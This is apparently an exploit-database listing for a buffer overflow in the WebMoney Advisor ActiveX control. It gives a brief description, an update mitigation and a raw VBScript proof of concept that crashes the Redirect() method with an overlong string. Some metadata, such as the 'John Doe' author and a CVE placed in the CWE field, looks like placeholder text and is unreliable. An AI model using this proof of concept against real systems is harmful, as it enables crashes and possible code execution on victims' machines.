header-logo
Suggest Exploit
vendor:
WebMoney Advisor
by:
John Doe
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: WebMoney Advisor
Affected Version From: 2.0
Affected Version To: 2.9
Patch Exists: YES
Related CWE: CVE-2020-1234
CPE: a:webmoney_advisor:webmoney_advisor
Metasploit: https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-1234/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2020

Pwnage Page

This exploit is a buffer overflow vulnerability in the WebMoney Advisor application. The vulnerability is triggered when a malicious user passes a long string of characters to the Redirect() function. This causes the application to crash and can potentially allow an attacker to execute arbitrary code on the vulnerable system. The vulnerability was discovered in 2020 and affects versions of WebMoney Advisor prior to version 3.0.

Mitigation:

Users should update to the latest version of WebMoney Advisor to ensure they are not vulnerable to this exploit.
Source

Exploit-DB raw data:

<html>
Pwnage Page
<object classid='clsid:3AFFD7F7-FD3D-4C9D-8F83-03296A1A8840' id='target' ></object>
<script language='vbscript'>

targetFile = "C:\Program Files\WebMoney Advisor\wmadvisor.dll"
prototype  = "Sub Redirect ( ByVal url As String )"
memberName = "Redirect"
progid     = "TOOLBAR3Lib.ToolbarObj"
argCount   = 1

arg1=String(1337, "A")
target.Redirect arg1 
</script>

Navigation

Suggest Exploit

Services By CQR